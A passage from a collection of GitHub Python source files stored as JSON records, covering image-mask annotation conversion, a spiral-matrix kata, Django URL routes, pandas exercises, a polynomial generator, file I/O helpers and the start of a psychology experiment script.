cv2.imread(segmentation_mask_path)\n segmentation_mask = cv2.resize(segmentation_mask, imagesize.get(image_path))\n\n # Read the binary mask, and find the contours associated\n table, players, scoreboard = seperate_channels(segmentation_mask)\n\n table = cv2.cvtColor(table, cv2.COLOR_BGR2GRAY)\n players = cv2.cvtColor(players, cv2.COLOR_BGR2GRAY)\n scoreboard = cv2.cvtColor(scoreboard, cv2.COLOR_BGR2GRAY)\n\n _, table = cv2.threshold(table, 1, 255, 0)\n _, players = cv2.threshold(players, 1, 255, 0)\n _, scoreboard = cv2.threshold(scoreboard, 1, 255, 0)\n\n table_contours, _ = cv2.findContours(table, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)\n players_contours, _ = cv2.findContours(\n players, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE\n )\n scoreboard_contours, _ = cv2.findContours(\n scoreboard, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE\n )\n\n # -------------------------------------------------------------------------------\n # BUILDING VGG ANNTOTATION TOOL ANNOTATIONS LIKE\n if table_contours or players_contours or scoreboard_contours:\n table_regions = [0] * len(table_contours)\n for i in range(len(table_contours)):\n table_regions[i] = {\n \"shape_attributes\": {\n \"name\": \"polygon\",\n \"all_points_x\": table_contours[i][:, 0][:, 0].tolist(),\n \"all_points_y\": table_contours[i][:, 0][:, 1].tolist(),\n },\n \"region_attributes\": {\"class\": \"table\"},\n }\n\n players_regions = [0] * len(players_contours)\n for i in range(len(players_contours)):\n players_regions[i] = {\n \"shape_attributes\": {\n \"name\": \"polygon\",\n \"all_points_x\": players_contours[i][:, 0][:, 0].tolist(),\n \"all_points_y\": players_contours[i][:, 0][:, 1].tolist(),\n },\n \"region_attributes\": {\"class\": \"players\"}\n }\n\n scoreboard_regions = [0] * len(scoreboard_contours)\n for i in range(len(scoreboard_contours)):\n scoreboard_regions[i] = {\n \"shape_attributes\": {\n \"name\": \"polygon\",\n \"all_points_x\": scoreboard_contours[i][:, 0][:, 0].tolist(),\n \"all_points_y\": scoreboard_contours[i][:, 0][:, 1].tolist(),\n },\n \"region_attributes\": {\"class\": \"scoreboard\"},\n }\n\n regions = dict(enumerate(table_regions + players_regions + scoreboard_regions))\n\n size = os.path.getsize(image_path)\n name = os.path.basename(image_path) + str(size)\n json_elt = {\"filename\": os.path.basename(image_path)}\n json_elt[\"size\"] = str(size)\n json_elt[\"regions\"] = regions\n json_elt[\"file_attributes\"] = {}\n return {name: json_elt}\n\n\ndef seperate_channels(image):\n b = image.copy()\n # set green and red channels to 0\n b[:, :, 1] = 0\n b[:, :, 2] = 0\n\n g = image.copy()\n # set blue and red channels to 0\n g[:, :, 0] = 0\n g[:, :, 2] = 0\n\n r = image.copy()\n # set blue and green channels to 0\n r[:, :, 0] = 0\n r[:, :, 1] = 0\n\n return r, g, b\n\n\nnum = os.path.basename(args.data_path)[-1]\nsuffix = \"\" if num == \"1\" else f\"_{num}\"\nfinal_dict = {}\nfor image in tqdm(os.listdir(os.path.join(args.data_path, args.masks_path))):\n final_dict |= generate_vgg_annotation(\n os.path.join(\n args.data_path, args.images_path, image.strip(\".png\") + f\"{suffix}.png\"\n ),\n os.path.join(args.data_path, args.masks_path, image),\n )\n\n\nwith open(os.path.join(args.data_path, \"via_region_data.json\"), \"w\") as json_file:\n json.dump(final_dict, json_file)\n","repo_name":"kethan1/table-tennis-game-annotator","sub_path":"data_processing/convert_to_vgg_annotation_format.py","file_name":"convert_to_vgg_annotation_format.py","file_ext":"py","file_size_in_byte":4459,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"11350504962","text":"#!/usr/bin/python3\n\n\"\"\"\nGiven an n x n array, return the array elements arranged from outermost elements to the middle element, traveling clockwise.\n\narray = [[1,2,3],\n [4,5,6],\n [7,8,9]]\nsnail(array) #=> [1,2,3,6,9,8,7,4,5]\nFor better understanding, please follow the numbers of the next array consecutively:\n\narray = [[1,2,3],\n [8,9,4],\n [7,6,5]]\nsnail(array) #=> [1,2,3,4,5,6,7,8,9]\nThis image will illustrate things more clearly:\n\n\nNOTE: The idea is not sort the elements from the lowest value to the highest;\nthe idea is to traverse the 2-d array in a clockwise snailshell pattern.\n\nNOTE 2: The 0x0 (empty matrix) is represented as en empty array inside an array [[]].\n\n\"\"\"\n\nimport unittest\n\nE, S, W, N = (1, 0), (0, 1), (-1, 0), (0, -1)\nturn_right = { E:S, S:W, W:N, N:E}\n\ndef snail(snail_map):\n result = []\n visited = []\n size = len(snail_map[0])\n x = 0\n y = 0\n direction = E\n\n if snail_map == [[]]:\n return []\n\n result.append(snail_map[0][0])\n visited.append((0,0))\n while True:\n if len(visited) == size**2:\n return result\n\n dx, dy = direction\n new_x, new_y = x + dx, y + dy\n if (0 <= new_x <= size-1 and 0 <= new_y <= size-1 and (new_y, new_x) not in visited):\n x, y = new_x, new_y\n visited.append((y, x))\n result.append(snail_map[y][x])\n\n else:\n direction = turn_right[direction]\n\n\nclass TestSnailList(unittest.TestCase):\n def test_list_equality(self):\n array = [[1,2,3],\n [4,5,6],\n [7,8,9]]\n expected = [1,2,3,6,9,8,7,4,5]\n self.assertListEqual(snail(array), expected)\n\n def test_list_equality2(self):\n array = [[1,2,3],\n [8,9,4],\n [7,6,5]]\n expected = [1,2,3,4,5,6,7,8,9]\n self.assertListEqual(snail(array), expected)\n\n\nif __name__==\"__main__\":\n unittest.main()\n","repo_name":"mikalai-dev/codewars","sub_path":"snail_list.py","file_name":"snail_list.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"247771992","text":"#!C:/Users/xiaox/Anaconda3 python\n# -*- coding: utf-8 -*-\n' what? '\n__author__ = 'xiaox'\n\nfrom functools import reduce\n\ndef str2num(s):\n try:\n return int(s)\n except Exception as e:\n print(\"补货异常进行修改\")\n return float(s)\n\ndef calc(exp):\n ss = exp.split('+')\n ns = map(str2num, ss)\n return reduce(lambda acc, x: acc + x, ns)\n\ndef main():\n r = calc('100 + 200 + 345')\n print('100 + 200 + 345 =', r)\n r = calc('99 + 88 + 7.6')\n print('99 + 88 + 7.6 =', r)\n\nmain()\n\n\nimport logging\nlogging.basicConfig(level=logging.INFO)\ns = '0'\nn = int(s)\nlogging.info('n = %d' % n)\nprint(10 / n)\n\n","repo_name":"hzqfxx/python","sub_path":"project/mydemo/oop/ErrorTest.py","file_name":"ErrorTest.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"27328701554","text":"from game.actions.action import Action\nfrom game.services.point import Point\nfrom game import constants\n\nclass Handle_Off_Screen_Action(Action):\n \"\"\"\n This class recives the cast and handles all actions \n related to actors on the ednge of the screen\n \"\"\"\n\n def execute(self, cast):\n \"\"\"\n Handles all off screen actions of the game.\n \"\"\"\n\n ###This will be used in a later version of the game to let bullets bouce on edge\n # for group in cast.values():\n # for actor in group:\n # if actor.get_bounce_on_edge():\n # if actor.get_position_y() < 0:\n # dx = actor.get_velocity_x()\n # dy = (actor.get_velocity_y()) * -1\n # actor.set_velocity(Point(dx,dy))\n # if actor.get_position_x() + actor.get_width() > constants.MAX_X or actor.get_position_x() < 0:\n # dx = (actor.get_velocity_x()) * -1\n # dy = actor.get_velocity_y()\n # actor.set_velocity(Point(dx,dy))\n\n #Removes the Bullets that have gone off the side of the screen\n for group in cast.values():\n for actor in group:\n if (actor.get_position_x() < -100 or\n actor.get_position_x() > constants.MAX_X + 100 or\n actor.get_position_y() < -100 or\n actor.get_position_y() > constants.MAX_Y + 100):\n \n cast[\"bullets\"].remove(actor)\n","repo_name":"DallinatorX/vs-bullet-heck","sub_path":"bullet-heck/game/actions/handle_off_screen_action.py","file_name":"handle_off_screen_action.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1799361310","text":"from django.urls import path\nfrom .views import (\n ContactsView,\n\n ProductDetailView,\n ProductListView,\n ProductCreateView,\n ProductUpdateView,\n CategoriesListView,\n CategoryDetailView,\n\n BlogCreateView,\n BlogListView,\n BlogDetailView,\n BlogUpdateView,\n BlogDeleteView,\n)\n\nfrom django.views.decorators.cache import cache_page\n\napp_name = 'catalog'\n\nurlpatterns = [\n path('', ProductListView.as_view(), name='inc_base'),\n\n path('contacts/', ContactsView.as_view(), name='contacts'),\n\n path('product//', cache_page(60)(ProductDetailView.as_view()), name='product_view'),\n path('product/create/', ProductCreateView.as_view(), name='product_create'),\n path('product//update/', ProductUpdateView.as_view(), name='product_update'),\n\n path('categories/', CategoriesListView.as_view(), name='categories'),\n path('categories/view/', CategoryDetailView.as_view(), name='view_category'),\n\n path('blog/', BlogListView.as_view(), name='entry_list'),\n path('blog/create/', BlogCreateView.as_view(), name='entry_form'),\n path('blog//', BlogDetailView.as_view(), name='entry_detail'),\n path('blog//update/', BlogUpdateView.as_view(), name='entry_update'),\n path('blog//delete/', BlogDeleteView.as_view(), name='entry_delete'),\n]\n","repo_name":"electr0n4ik/catalog_django","sub_path":"catalog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"20582875490","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[18]:\n\n\n# Гараас оруулсан n тоо хүртэл “*” тэмдэгтийг мөр бүрд хэвлэх функц бич\nn = int(input())\nk = 1 \nfor i in range(n + 1):\n k =\"*\"*1\n i += 1\n print(k)\n\n\n# In[19]:\n\n\n# Гараас оруулсан n тоо хүртэл “*” тэмдэгтийг жагсаалтын мөр бүрд хэвлэх функц бич.\ndef pypart(n):\n mylist =[]\n for i in range(1, 1+n):\n mylist.append(\"*\"*i)\n print(\"\\n\".join(mylist))\n n = int(input())\npypart(n)\n\n\n# In[20]:\n\n\n#Дараах жагсаалтаас хамгийн их, хамгийн бага key-г авах функц бич.\na_dictionary = {'Bat': 18, 'Oyun': 22, 'Dulam': 21, 'Suren': 20}\nmax_key = max(a_dictionary, key=a_dictionary.get)\nmin_key = min(a_dictionary, key=a_dictionary.get)\na = (max_key, min_key)\nprint(a)\n\n\n# In[22]:\n\n\n# np.arange(1-1000) массив үүсгэ. Тухайн массиваас 3 эсвэл 7 –д хуваагдах тоонуудын нийлбэрийг ол.\nimport numpy as np\nx = np.arange(1, 1000)\nn = x[(x % 3 == 0) | (x % 7 == 0)]\nprint(n)\nprint(n.sum())\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"Sodmunkh/DBP221","sub_path":"Seminar №5, DBP221 (421), B20FA1514 .py","file_name":"Seminar №5, DBP221 (421), B20FA1514 .py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"mn","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"22950161495","text":"import pandas\n\ndata = pandas.read_csv(\"../../datasets/customer-churn-model/Customer Churn Model.txt\")\n# print(data.head())\n\n# Selection of a specific set of data by selection one column\n\naccount_length = data[\"Account Length\"]\n# print(account_length.head())\n\n# Creation of subset data from several datas\nsubset = data[[\"Account Length\", \"Phone\", \"Eve Charge\", \"Day Calls\"]]\n# print(subset.head())\n\ndesired_columns = [\"Account Length\", \"Phone\", \"Eve Charge\", \"Day Calls\"]\nsubset = data[desired_columns]\n# print(subset.head())\n\n# Simple list comprehension for creating a subset based on the list of desired items\ndesired_columns = [\"Account Length\", \"VMail Message\", \"Day Calls\"]\nall_columns_list = data.columns.values.tolist()\n\nprint(all_columns_list)\nsublist = [column for column in all_columns_list if column in desired_columns]\n\nprint(sublist)\n","repo_name":"jlaitue/Python-ML","sub_path":"data_wrangling/subset_data_columns.py","file_name":"subset_data_columns.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30479019734","text":"#coding = utf-8\r\n'''\r\n本程序是为了接收样本使用\r\n'''\r\nfrom send import *\r\nimport os\r\n\r\nstrans = sTrans()\r\n\r\nip = '127.0.0.1'\r\nport = 2000\r\ns = strans.build_socket(ip,port)\r\ns.listen(500)\r\nrecvPath = '/home/g6/tmp/' #接收到的文件可以自定义存放位置\r\n\r\nwhile 1:\r\n conn,addr = s.accept()\r\n strans.recving(conn,recvPath)\r\n strans.close_socket(conn)\r\n\r\n","repo_name":"weiyuchen/Tools","sub_path":"auto_asyn/sampleBase.py","file_name":"sampleBase.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"3338345275","text":"# 34 -----------------сдал как 33\n# Задана натуральная степень k. Сформировать случайным образом список коэффициентов \n# (значения от 0 до 100) многочлена и записать в файл многочлен степени k. \n# *Пример: \n# k=2 => 2*x² + 4*x + 5 = 0 или x² + 5 = 0 или 10*x² = 0\n\n\n \n'''degree^ - дуга^ - степень^\n reduce - редкий - уменьшение'''\nimport random\n \ndef get_polynom(degree):\n polynom_str = '' # создаем стринговую пустую строку\n for i in range(degree, -1, -1): # мы используем диапазон целых чисел от degree рандомного числа и до -1 с шагом -1\n # -1 шаг значит в обратную сторону; -1 ВТОРОЕ ЧИСЛО это мы захватываем и 0, где будет наше число без икса х\n a = random.randint(0, 100) # получаем некое рандомное число random.randint(0, 100)\n print(i,degree) # 0 10\n if a != 0: # если a != 0 это условие при котром значение а цифра перед х не будлет равно 0\n if i == degree and i != 1: # это охначает обращение к первому числу слева !!!!!!!!!!!!!!!!\n polynom_str += str(a) + '*x^' + str(i) # это первое число в уравнении слева\n # elif i == degree and i == 1: # это обращение ко всем числам, оно лищнее\n # polynom_str += str(a) + 'x'\n elif i == 1: # это обращение конкретно к элементу 2 или индексу элемента 1 в строке от нуля\n polynom_str += ' + ' + str(a) + '*x' # переделывыаем в этом элементе 'x^' на 'x'\n elif i == 0: # это обращение конкретно к элементу 1 или индексу элемента 0 в строке от нуля\n polynom_str += ' + ' + str(a) # тут мы оставляем число \n # по сути выше у нас рабираются три элемента последний, первый и второй\n else: # и else говорит, что теперь всем остальным элементам кроме трех что выше присваиваем следующее\n polynom_str += ' + ' + str(a) + '*x^' + str(i) # + цифра + х + степень\n return polynom_str + ' = 0' # сдесь написано -- возвращаем все уроавнение и приписываем = 0\n\ndegree = random.randint(3,10)\nresult = get_polynom(degree)\nprint(f'Многочлен степени {degree}: {result}') # 64x^6 + 16x^5 + 87x^4 + 64x^3 + 51x^2 + 8x + 87 = 0\n\n\n'''2 вариант '''\nimport random\nfrom functools import reduce\nimport re\n\n''' Функция sub() модуля re возвращает строку, полученную путем замены крайнего левого \nнеперекрывающегося вхождения шаблона регулярного выражения pattern в строке string на строку замены repl. \nЕсли шаблон регулярного выражения не найден, строка возвращается без изменений.'''\n\ndef normalize_polynom(polynom_str): # общепринятые сокращения\n print(polynom_str) # 64x^5 + 23x^4 + 17x^3 + 98x^2 + 92x^1 + 14x^0 + \n polynom_str = re.sub(r'\\b0x\\^\\d+ \\+ ', r'', polynom_str) # 0x^k' -> '' убирает такой символ, потому что 0\n polynom_str = re.sub(r'\\b1x\\^(\\d+)', r'x\\^\\1', polynom_str) # 1x^k' -> 'x^k' убирает 1 если встречается в цифре\n # polynom_str = re.sub(r'(\\d+)x\\^1', r'\\1x', polynom_str) # nx^1' -> 'nx' удаляем 1 в степени\n polynom_str = re.sub(r'(\\d+)x\\^0', r'\\1', polynom_str) # nx^0' -> 'n' последнее число справа индекс 0 \n print(polynom_str) # 64x^5 + 23x^4 + 17x^3 + 98x^2 + 92x + 14 + \n return polynom_str\n\ndef get_polynom_x(k):\n polynom_list = [str(random.randint(0, 100)) + 'x^' + str(n) + ' + ' for n in range(k, -1, -1)]\n # n будет каждый раз уменьшаться на -1 и идти назад -1 получаем некое рандомное число random.randint(0, 100)\n # канкетенироуем его с 'x^' и канкетинируем его со строковым представлением нашего числа полученного str(n) степень\n # и прибавляем + ' + '\n # мы берем диапазон числа к до -1 с шагом -1 # получим обратный счет 6 5 4 3 2 1 0\n # polynom_str = reduce(lambda x, y: x + y, polynom_list) # объединяется весь список уравнения через reduce\n polynom_str = ''.join(polynom_list) # строки можно соединять проще через join если не нужно посчитать интовое значение\n polynom_str = normalize_polynom(polynom_str)\n return polynom_str[: -3] + ' = 0' # это означает отступить с конца 3 символа удалив содержимое и заполнив его ' = 0'\n'''функция reduce получает последовательность polynom_list и она складывает всю последовательность'''\n'''reduce(lambda x, y: x + y, polynom_list) объединяется весь список'''\n''' ПРИМЕР\n # polynom_list = '1', '2', '3', '4', '5'\n # polynom_str = reduce(lambda x, y: x + y, polynom_list)\n # print(polynom_str) # 12345\n чтобы получить сумму элементов нужно перевести в интовое значение\n polynom_str = reduce(lambda x, y: int(x) + int(y), polynom_list) # в этом случае print выдаст результат = 15\n # print(polynom_str) # 15'''\n\n# тест\nimport os\nk = random.randint(1, 10)\npolynom = get_polynom_x(k)\nprint(f'Полином степени {k}: {polynom}') # Полином степени 5: 64x^5 + 23x^4 + 17x^3 + 98x^2 + 92x + 14 = 0\n\nwith open('ex_48_out.txt', 'w') as data:\n data.write(polynom)\n\n\n'''3 вариант изменённый'''\nimport random\nfrom functools import reduce\nimport re\n'''ОНО УЖЕ НЕ НУЖНО!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!'''\ndef normalize_polynom(polynom_str): # общепринятые сокращения\n print(polynom_str) # 64x^5 + 23x^4 + 17x^3 + 98x^2 + 92x^1 + 14x^0 + \n polynom_str = re.sub(r'\\b0x\\^\\d+ \\+ ', r'', polynom_str) # 0x^k' -> '' убирает такой символ, потому что 0\n polynom_str = re.sub(r'\\b1x\\^(\\d+)', r'x\\^\\1', polynom_str) # 1x^k' -> 'x^k' убирает 1 если встречается в цифре\n # polynom_str = re.sub(r'(\\d+)x\\^1', r'\\1x', polynom_str) # nx^1' -> 'nx' удаляем 1 в степени\n polynom_str = re.sub(r'(\\d+)x\\^0', r'\\1', polynom_str) # nx^0' -> 'n' последнее число справа индекс 0 \n print(polynom_str) # 64x^5 + 23x^4 + 17x^3 + 98x^2 + 92x + 14 + \n return polynom_str\n'''!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!'''\ndef get_polynom_x(k):\n polynom_list = ''\n # polynom_list = [str(random.randint(0, 100)) + 'x^' + str(n) + ' + ' for n in range(k, -1, -1)]\n\n '''Несколько if означает, что ваш код будет идти и проверять все условия if, \n где, как и в случае elif, если одно условие if удовлетворяет, оно не будет проверять другие условия..'''\n \n for n in range(k, -1, -1):\n a = str(random.randint(0, 100)) \n if n == 1: \n polynom_list += str(a) + 'x'+ ' + '\n elif n == 0: \n polynom_list += str(a)\n else:\n polynom_list += str(a) + 'x^' + str(n) + ' + ' \n polynom_str = ''.join(polynom_list) # строки можно соединять проще через join если не нужно посчитать интовое значение\n polynom_str = normalize_polynom(polynom_str)\n return polynom_str + ' = 0' # ъто означает отступить с конца 3 символа удалив содержимое и заполнив его ' = 0'\n\n# тест\nimport os\nk = random.randint(10, 10)\npolynom = get_polynom_x(k)\nprint(f'Полином степени {k}: {polynom}') # Полином степени 5: 64x^5 + 23x^4 + 17x^3 + 98x^2 + 92x + 14 = 0\n\n\n\n'''4 вариант '''\nfrom random import randint\nimport itertools\n\nk = randint(3, 10) # рандом степень\n\ndef get_ratios(k):\n ratios = [randint(0, 100) for i in range (k + 1)] # берет коэффициент и +1 следующий из начального числа рандома\n # b так заполняют список ratios\n while ratios[0] == 0: # пока нулевой коэффициент = 0\n ratios[0] = randint(1, 10) # рандомные числа присваиваются к нулевому коэффициенту\n return ratios\nprint(get_ratios(k)) # только смотреть надо ниже в принтах конечных, будет другой рандом а не этот [9, 9, 4, 8]\n\ndef get_polynomial(k, ratios): # в функции задействовано степень х и прошлые полученные числа\n var = ['*x^']*(k-1) + ['*x'] # это не метод а просто кто то так назвал var !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\n print(var) # ['*x^', '*x^', '*x']\n polynomial = [[a, b, c] for a, b, c in itertools.zip_longest(ratios, var, range(k, 1, -1), fillvalue = '') if a !=0]\n # беется 3 аргумента нужные нам для каждого элемента уравнения , запускается цикл в itertools.zip_longest\n # b сопоставляют цифры - ratios, иксы с знаком умножения - var, обэединяют в картэж с последовательностью \n # от рандом степени к до 1 с шагом -1, значит обратный варинат от большего к меньшему, все лишнее выкидывается\n # а пропущенные элементы заполняются значением fillvalue.'''при этом выполняется условие если a !=0\n '''Функция zip_longest() модуля itertools создает итератор, который объединяет элементы из каждой \n итерируемой последовательности *iterables в кортежи.\n\n Отличие функции itertools.zip_longest() от встроенной функции zip() заключается в том, что zip() \n останавливается по исчерпании самой короткой входной последовательности и отбрасывает несопоставимые \n значения более длинных итераций, в то время как itertools.zip_longest() работает пока самая длинная \n итерация не будет исчерпана, а пропущенные элементы заполняются значением fillvalue.'''\n print(polynomial) # [[5, '*x^', 3], [10, '*x^', 2], [9, '*x', ''], [5, '', '']]\n for x in polynomial:\n x.append(' + ') # берем каждый элемент x списка polynomial и присваиваем между ними (' + ')\n polynomial = list(itertools.chain(*polynomial)) # составление нового большого списка через list\n print(polynomial) # [5, '*x^', 3, ' + ', 10, '*x^', 2, ' + ', 9, '*x', '', ' + ', 5, '', '', ' + ']\n polynomial[-1] = ' = 0' # присваиваем polynomial на месте последнего элемента [-1] концовку уравнения ' = 0'\n print(polynomial) # [5, '*x^', 3, ' + ', 10, '*x^', 2, ' + ', 9, '*x', '', ' + ', 5, '', '', ' = 0']\n return \"\".join(map(str, polynomial)).replace(' 1*x',' x') # составляет стринговый вариант записи jpin\n # с помощью мар создаем новую коллекцию стринговых элементов из polynomial. заменяем на ходу если есть(' 1*x',' x')\n\n'''map() — это встроенная функция, которая позволяет обрабатывать и преобразовывать все элементы \nв итерируемом объекте без использования явного цикла for, методом, широко известным как сопоставление (mapping). \nmap() полезен, когда вам нужно применить функцию преобразования к каждому элементу в коллекции \nили в массиве и преобразовать их в новый массив.'''\n\nratios = get_ratios(k)\nprint(ratios) # [5, 10, 9, 5]\npolynom1 = get_polynomial(k, ratios)\nprint(polynom1) # 9*x^3 + 10*x^2 + 9*x + 7 = 0\n\nwith open('33_Polynomial.txt', 'w') as data: # ну а тут открываем файл и принудительно записываем в него\n data.write(polynom1)\n\n\n","repo_name":"Kassey69/Python_seminars_old","sub_path":"Seminar5/Task48_DZ.py","file_name":"Task48_DZ.py","file_ext":"py","file_size_in_byte":14220,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"70584660993","text":"# -*- coding:utf-8 -*-\n# @FileName :core.py\n# @Author :Deyu He\n# @Time :2022/7/11 12:39\n\nimport json\nimport os\nimport shutil\nimport xml.etree.ElementTree as ET\nfrom pathlib import Path\nfrom typing import Iterator, List, Union\n\nimport yaml\nfrom loguru import logger\n\n__all__ = [\n \"mkdir\",\n \"append_file_name\",\n \"replace_parent\",\n \"copy_related_files\",\n \"glob_dir\",\n \"load_xml\",\n \"dump_xml\",\n \"load_yaml\",\n \"dump_yaml\",\n \"load_json\",\n \"dump_json\",\n]\n\n\ndef mkdir(path, parents=True, exist_ok=True):\n Path(str(path)).mkdir(parents=parents, exist_ok=exist_ok)\n\n\ndef append_file_name(path_, append_str):\n path_ = Path(path_)\n return str(path_.parent / Path(path_.stem + append_str).with_suffix(path_.suffix))\n\n\ndef replace_parent(path_, target_prarent):\n path_ = Path(path_)\n return str(Path(target_prarent) / path_.name)\n\n\ndef glob_dir(\n dir_,\n include_patterns: Union[List[str], None] = None,\n exclude_patterns: Union[List[str], None] = None,\n ignore_case=False,\n) -> Iterator[Path]:\n \"\"\"Glob directory recursively and filter paths by extensions and filename suffix\n\n Args:\n dir_: directory path\n include_patterns: list of include patterns, eg [\"*.png\", \"*.txt\"]\n exclude_patterns: list of exclude patterns, eg: [\"*mask.png\", \"*mask.txt\"]\n ignore_case: case sensitive match or not\n\n Returns:\n Iterator[Path]: an iterator of matched paths under given directory\n\n Raises:\n FileNotFoundError: If given directory dose not exist\n\n Examples:\n # glob current directory, get .py files without *version.py like files\n >>> glob_dir(\".\", include_patterns=[\"*.py\"], exclude_patterns=[\"*version.py\"])\n \"\"\"\n dir_ = Path(dir_)\n\n if not dir_.is_dir():\n raise FileNotFoundError(f\"directory {dir_} dose not exist!\")\n\n def all_pass_filter(_):\n return True\n\n def _include_filter(p: Path):\n if ignore_case:\n p = Path(p.as_posix().lower())\n\n return any(p.match(pattern) for pattern in include_patterns) # type: ignore\n\n def _exclude_filter(p: Path):\n if ignore_case:\n p = Path(p.as_posix().lower())\n\n return all(not p.match(pattern) for pattern in exclude_patterns) # type: ignore\n\n include_filter = _include_filter if include_patterns else all_pass_filter\n exclude_filter = _exclude_filter if exclude_patterns else all_pass_filter\n\n def path_filter(path: Path):\n return include_filter(path) and exclude_filter(path)\n\n return filter(path_filter, dir_.rglob(\"*\"))\n\n\ndef load_xml(filename):\n return ET.parse(str(filename))\n\n\ndef dump_xml(filename, method=\"r\", encoding=\"utf-8\"):\n pass\n\n\ndef load_yaml(filename, method=\"r\", encoding=\"utf-8\"):\n \"\"\"\n Parse the first YAML document in a stream\n and produce the corresponding Python object.\n \"\"\"\n if \"b\" in method:\n with open(filename, method) as f:\n return yaml.load(stream=f, Loader=yaml.FullLoader)\n else:\n with open(filename, method, encoding=encoding) as f:\n return yaml.load(stream=f, Loader=yaml.FullLoader)\n\n\ndef dump_yaml(data, filename, method=\"w\", encoding=\"utf-8\", safe_mode=False, **kwargs):\n \"\"\"\n Serialize a Python object into a YAML stream.\n If stream is None, return the produced string instead.\n \"\"\"\n if safe_mode:\n temp_file_name = filename + \"_temp\"\n else:\n temp_file_name = filename\n\n with open(temp_file_name, method) as f:\n if \"b\" in method:\n ret = yaml.dump(data=data, stream=f, encoding=encoding, **kwargs)\n else:\n ret = yaml.dump(data=data, stream=f, **kwargs)\n if safe_mode:\n f.flush()\n os.fsync(f.fileno())\n\n if safe_mode:\n os.rename(temp_file_name, filename)\n\n return ret\n\n\ndef load_json(filename, method=\"r\", **kwargs):\n if method == \"r\":\n with open(filename, method) as f:\n data = json.load(f, **kwargs)\n elif method == \"rb\":\n decode_method = kwargs.get(\"encoding\", None)\n with open(filename, method) as f:\n data = f.read()\n if decode_method is not None:\n data = data.decode(decode_method)\n data = json.loads(data)\n return data\n\n\ndef dump_json(data, filename, method=\"w\", indent=None, safe_mode=False, **kwargs):\n \"\"\"\n Dump data to json file\n\n Args:\n data: json serializable python object, dict, list etc...\n dumped data\n filename: str or Path\n path of dumped json file\n method(str): an optional string that specifies the mode in which the file\n is opened\n indent: None or int\n If ``indent`` is a non-negative integer, then JSON array elements and\n object members will be pretty-printed with that indent level. An indent\n level of 0 will only insert newlines. ``None`` is the most compact\n representation.\n safe_mode(bool): Dump in safe mode or not\n \"\"\"\n if safe_mode:\n temp_file_name = filename + \"_temp\"\n else:\n temp_file_name = filename\n\n if \"b\" in method:\n raise ValueError(\"can not dump json with binary mode!\")\n\n with open(temp_file_name, method) as f:\n json.dump(obj=data, fp=f, indent=indent, **kwargs)\n\n if safe_mode:\n f.flush()\n os.fsync(f.fileno())\n\n if safe_mode:\n os.rename(temp_file_name, filename)\n\n\ndef copy_related_files(\n src_dir,\n dst_dir,\n ref_dir,\n copy=True,\n src_suffix=None,\n ref_suffix=None,\n parents=True,\n exist_ok=True,\n):\n src_dir = Path(src_dir).absolute()\n dst_dir = Path(dst_dir).absolute()\n ref_dir = Path(ref_dir).absolute()\n Path(str(ref_dir)).mkdir(parents=parents, exist_ok=exist_ok)\n ref_file_list = list(\n glob_dir(\n ref_dir,\n include_patterns=[f\"*{ref_suffix}\"] if ref_suffix is not None else None,\n )\n )\n for ref_file_path in ref_file_list:\n\n ref_file_name = ref_file_path.name\n if ref_suffix is not None:\n src_file_name = ref_file_name.split(ref_suffix)[0]\n else:\n src_file_name = ref_file_name\n if src_suffix is not None:\n src_file_name += src_suffix\n src_file_path = Path(src_dir) / src_file_name\n\n if not Path(src_file_path).exists():\n logger.warning(f\"{src_file_path} does not exist.\")\n elif copy:\n shutil.copy(src_file_path, Path(dst_dir) / src_file_name)\n else:\n shutil.move(src_file_path, Path(dst_dir) / src_file_name)\n","repo_name":"HeDeYu/pyutils","sub_path":"src/pyutils/file_io/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":6621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"14779848869","text":"import datetime\n\nimport numpy as np\nimport pandas as pd\nimport neurokit as nk\nimport neuropsydia as n\n\nfrom StarControl_Core import *\nfrom StarControl_Utils import *\n\n\n\n# -----------------------------------------------------------------------------\n# Part 1\n# -----------------------------------------------------------------------------\ndef processing_speed(n_trials=60, testmode = False, display_trigger = False):\n\n # Data creation\n data = {\"Stimulus_Side\": [\"RIGHT\"]*int(n_trials/2) + [\"LEFT\"]* int(n_trials/2),\n \"ITI\": list(generate_interval_frames(500, 1500, n_trials/2))*2}\n\n data = pd.DataFrame.from_dict(data)\n data = data.sample(len(data)).reset_index(drop=True)\n data = data.to_dict(orient=\"index\")\n\n # Instructions\n if testmode is False:\n n.newpage((24,4,64), auto_refresh=False)\n n.write(\"One year ago...\", color=\"white\", y=2, 